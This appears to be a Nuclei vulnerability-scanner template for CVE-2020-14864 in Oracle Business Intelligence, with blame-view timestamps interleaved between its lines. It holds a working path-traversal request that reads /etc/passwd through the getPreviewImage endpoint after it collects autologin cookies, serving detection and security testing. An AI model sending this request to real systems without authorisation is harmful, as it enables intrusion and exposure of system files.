2020-10-29 09:54:06 +00:00
id : CVE-2020-14864
2022-04-22 10:38:41 +00:00
2020-10-29 09:54:06 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Oracle Fusion - Directory Traversal/Local File Inclusion
2020-10-29 09:54:06 +00:00
author : Ivo Palazzolo (@palaziv)
severity : high
2022-07-26 13:45:11 +00:00
description : Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage."
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 15:28:22 +00:00
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-14864
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-14864
2022-08-27 04:41:18 +00:00
tags : cve,cve2020,oracle,lfi,kev,packetstorm
2021-02-05 19:44:41 +00:00
2020-10-29 09:54:06 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
cookie-reuse : true
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- 'root:.*:0:0:'
2022-07-26 13:45:11 +00:00
part : body
# Enhanced by mp on 2022/07/13